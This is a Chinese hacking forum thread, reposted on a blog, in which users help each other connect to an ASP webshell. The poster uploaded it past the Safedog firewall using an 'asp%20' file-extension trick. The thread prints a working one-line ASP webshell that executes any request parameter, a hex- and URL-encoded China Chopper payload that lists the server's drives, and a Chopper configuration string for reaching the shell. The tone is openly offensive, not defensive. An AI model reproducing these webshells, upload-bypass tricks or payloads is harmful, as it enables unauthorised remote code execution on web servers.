最新的安全狗用了一句话绕过了但是怎么能连接呢?

  • A+
所属分类:网络安全

最新的安全狗用了一句话绕过了但是怎么能连接呢?

上传的时候用asp%20绕过直接上传了asp文件 但是呢打开以后没有东西可以连接啊~过狗菜刀又不行~用的这个一句话<% 

re= request("sb") 

if re <>"" then 

execute re 

response.end 

end if 

%>

1#Sct7p | 2014-08-30 02:14

菜刀中转试了?

 

2#大白菜 | 2014-08-30 02:15

@Sct7p 啊?怎么整?没听过呢还

 

3#Sct7p | 2014-08-30 02:18

楼主可以百度一下过狗相关的技术         http://phpinfo.me/2014/05/06/545.html

 

4#大白菜 | 2014-08-30 02:40

@Sct7p 我的是asp的如果按照他那个方式不行有错误

 

5#大白菜 | 2014-08-30 02:44

@大白菜 pass=Execute%28%5C%22Execute%28%5C%22%5C%22On+Error+Resume+Next%3AFunction+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%5C%22%5C%22%5C%22%5C%22bd%3Dbd%26chr%28%26H%5C%22%5C%22%5C%22%5C%22%26c%26%5C%22%5C%22%5C%22%5C%22%29%5C%22%5C%22%5C%22%5C%22%29%3AElse%3AExecute%28%5C%22%5C%22%5C%22%5C%22bd%3Dbd%26chr%28%26H%5C%22%5C%22%5C%22%5C%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%5C%22%5C%22%5C%22%5C%22%29%5C%22%5C%22%5C%22%5C%22%29%3Ai%3Di%2B2%3AEnd+If%5C%22%5C%22%26chr%2810%29%26%5C%22%5C%22Next%3AEnd+Function%3AResponse.Write%28%5C%22%5C%22%5C%22%5C%22-%3E%7C%5C%22%5C%22%5C%22%5C%22%29%3AExecute%28%5C%22%5C%22%5C%22%5C%22On+Error+Resume+Next%3A%5C%22%5C%22%5C%22%5C%22%26bd%28%5C%22%5C%22%5C%22%5C%2244696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329%5C%22%5C%22%5C%22%5C%22%29%29%3AResponse.Write%28%5C%22%5C%22%5C%22%5C%22%7C%3C-%5C%22%5C%22%5C%22%5C%22%29%3AResponse.End%5C%22%5C%22%29%5C%22%29

 

6#大白菜 | 2014-08-30 02:45

@Sct7p pass=Execute%28%5C%22Execute%28%5C%22%5C%22On+Error+Resume+Next%3AFunction+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%5C%22%5C%22%5C%22%5C%22bd%3Dbd%26chr%28%26H%5C%22%5C%22%5C%22%5C%22%26c%26%5C%22%5C%22%5C%22%5C%22%29%5C%22%5C%22%5C%22%5C%22%29%3AElse%3AExecute%28%5C%22%5C%22%5C%22%5C%22bd%3Dbd%26chr%28%26H%5C%22%5C%22%5C%22%5C%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%5C%22%5C%22%5C%22%5C%22%29%5C%22%5C%22%5C%22%5C%22%29%3Ai%3Di%2B2%3AEnd+If%5C%22%5C%22%26chr%2810%29%26%5C%22%5C%22Next%3AEnd+Function%3AResponse.Write%28%5C%22%5C%22%5C%22%5C%22-%3E%7C%5C%22%5C%22%5C%22%5C%22%29%3AExecute%28%5C%22%5C%22%5C%22%5C%22On+Error+Resume+Next%3A%5C%22%5C%22%5C%22%5C%22%26bd%28%5C%22%5C%22%5C%22%5C%2244696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329%5C%22%5C%22%5C%22%5C%22%29%29%3AResponse.Write%28%5C%22%5C%22%5C%22%5C%22%7C%3C-%5C%22%5C%22%5C%22%5C%22%29%3AResponse.End%5C%22%5C%22%29%5C%22%29

 

7#RedFree | 2014-08-30 10:19

@大白菜 菜刀配置处填:<O>sb=eval(request(0))</O> 连接密码为0。

 

8#大白菜 | 2014-08-30 15:02

@RedFree 那一句话密码不用啊?

 

9#小鸡鸡 | 2014-09-03 18:48

@大白菜 同求


  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: